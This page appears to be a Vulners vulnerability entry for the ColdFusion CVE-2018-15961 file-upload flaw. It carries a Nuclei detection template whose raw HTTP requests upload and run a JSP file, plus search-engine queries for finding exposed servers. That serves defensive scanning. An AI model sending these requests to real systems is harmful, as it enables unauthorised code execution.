| Reporter | Title | Published | Views | Family All 39 |
|---|---|---|---|---|
| Adobe ColdFusion 2018 - Arbitrary File Upload Vulnerability | 12 Dec 201800:00 | – | zdt | |
| Adobe Coldfusion 11 CKEditor Arbitrary File Upload Exploit | 10 Jan 201900:00 | – | zdt | |
| Exploit for Unrestricted Upload of File with Dangerous Type in Adobe Coldfusion | 3 Oct 202123:31 | – | githubexploit | |
| Exploit for Unrestricted Upload of File with Dangerous Type in Adobe Coldfusion | 30 Jun 202108:15 | – | githubexploit | |
| Adobe ColdFusion CKEditor file upload | 25 Sep 201800:00 | – | attackerkb | |
| CVE-2018-15961 | 25 Sep 201800:00 | – | attackerkb | |
| The vulnerability of the ColdFusion interpreter lies in the lack of restrictions on file uploads, which allows attackers to execute arbitrary code. | 15 May 202000:00 | – | bdu_fstec | |
| CVE-2018-15961 | 12 Nov 201818:53 | – | circl | |
| Adobe ColdFusion Unrestricted File Upload Vulnerability | 3 Nov 202100:00 | – | cisa_kev | |
| Adobe ColdFusion Arbitrary File Upload Vulnerability | 12 Sep 201800:00 | – | cnvd |
id: CVE-2018-15961
info:
name: Adobe ColdFusion - Unrestricted File Upload Remote Code Execution
author: SkyLark-Lab,ImNightmaree
severity: critical
description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution.
impact: |
Successful exploitation of this vulnerability can result in remote code execution, allowing an attacker to take control of the affected system.
remediation: |
Apply the necessary security patches or updates provided by Adobe to fix this vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-15961
- https://github.com/xbufu/CVE-2018-15961
- https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html
- http://web.archive.org/web/20220309060906/http://www.securitytracker.com/id/1041621
- http://www.securitytracker.com/id/1041621
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-15961
cwe-id: CWE-434
epss-score: 0.9995
epss-percentile: 0.99974
cpe: cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:*
metadata:
max-request: 2
vendor: adobe
product: coldfusion
shodan-query:
- http.component:"Adobe ColdFusion"
- http.component:"adobe coldfusion"
- http.title:"coldfusion administrator login"
- cpe:"cpe:2.3:a:adobe:coldfusion"
fofa-query:
- title="coldfusion administrator login"
- app="adobe-coldfusion"
google-query: intitle:"coldfusion administrator login"
tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive,vkev,vuln
http:
- raw:
- |
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
-----------------------------24464570528145
Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"
Content-Type: image/jpeg
<%@ page import="java.util.*,java.io.*"%>
<%@ page import="java.security.MessageDigest"%>
<%
String cve = "CVE-2018-15961";
MessageDigest alg = MessageDigest.getInstance("MD5");
alg.reset();
alg.update(cve.getBytes());
byte[] digest = alg.digest();
StringBuffer hashedpasswd = new StringBuffer();
String hx;
for (int i=0;i<digest.length;i++){
hx = Integer.toHexString(0xFF & digest[i]);
if(hx.length() == 1){hx = "0" + hx;}
hashedpasswd.append(hx);
}
out.println(hashedpasswd.toString());
%>
-----------------------------24464570528145
Content-Disposition: form-data; name="path"
{{randstr}}.jsp
-----------------------------24464570528145--
- |
GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961
- type: status
status:
- 200
# digest: 490a00463044022057acd3d7ba94d6a7ff0e443f5cfbc405e478cd729eac5cc64fa114a050cea94e022007a17d05daaedc2ef6c098c72245e13c6380a9404c248442b58227365509bf39:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation